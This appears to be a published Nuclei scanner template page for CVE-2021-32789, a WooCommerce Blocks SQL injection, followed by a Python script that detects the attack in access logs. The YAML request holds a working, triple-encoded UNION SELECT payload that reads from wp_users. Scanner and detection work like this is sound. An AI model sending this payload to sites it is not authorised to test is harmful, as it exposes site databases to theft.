WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
ID: CVE-2021-32789
Severity: high
Author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
Tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic
Description
woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the wc/store/products/collection-data?calculate_attribute_counts[][taxonomy] endpoint that allows the execution of a read-only SQL query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
YAML Source
id: CVE-2021-32789

info:
  name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
  author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
  severity: high
  description: |
    woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
  remediation: |
    Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability.
  reference:
    - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
    - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
    - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
    - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32789
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-32789
    cwe-id: CWE-89
    epss-score: 0.09336
    epss-percentile: 0.94559
    cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: automattic
    product: woocommerce_blocks
    framework: wordpress
  tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic

http:
  - method: GET
    path:
      - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'sqli-test'
          - 'attribute_counts'
          - 'price_range'
          - 'term'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022034e5bd0723da107634d96b959c236cb09561eb5ecd77af885c183904e0a8cc56022100df5180a952a6dc407d90562060ad4152df214721e91ae4e62962f76873385f27:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-32789.yaml"
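
The request in the template carries its taxonomy value percent-encoded three times, so a log search that decodes once and looks for SQL keywords will not see it. The Python example below is added here and is not part of the template or of Nuclei: it decodes the `calculate_attribute_counts[…][taxonomy]` value from access-log lines until it stops changing and flags anything that is not a plain slug. The combined log format, the slug rule and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "/wc/store/products/collection-data"
# Parameter shape named in the advisory: calculate_attribute_counts[<n>][taxonomy]
TAXONOMY_KEY = re.compile(r"^calculate_attribute_counts\[[^\]]*\]\[taxonomy\]$")
# Assumption: a legitimate taxonomy name is a plain slug such as pa_color.
SLUG = re.compile(r"^[a-z0-9_-]+$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
PREFIX = "/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0]"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Aug/2021:10:00:00 +0000] "GET {PREFIX}[taxonomy]=pa_color HTTP/1.1" 200 512',
    f'198.51.100.9 - - [01/Aug/2021:10:00:05 +0000] "GET {PREFIX}[taxonomy]='
    '%252522%252529%252520union%252520all%252520select%2525201 HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Aug/2021:10:00:09 +0000] "GET /wp-json/wc/store/products?per_page=9 HTTP/1.1" 200 2048',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (value, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def suspicious_taxonomy(log_line):
    """Return (decoded value, encoding layers) for a non-slug taxonomy value, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qsl(url.query, keep_blank_values=True)  # removes the first layer
    route = dict(params).get("rest_route", "")
    if ENDPOINT not in url.path and ENDPOINT not in route:
        return None
    for key, value in params:
        if TAXONOMY_KEY.match(key):
            decoded, extra = fully_decode(value)
            # Extra encoding layers or non-slug characters are both worth a look.
            if extra or not SLUG.match(decoded):
                return decoded, extra + 1
    return None

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_taxonomy(line))
```

A hit on a site that was running an unpatched WooCommerce Blocks version at the time of the request is a reason to review what that response returned, since the matchers above rely on the query result being reflected in the JSON body.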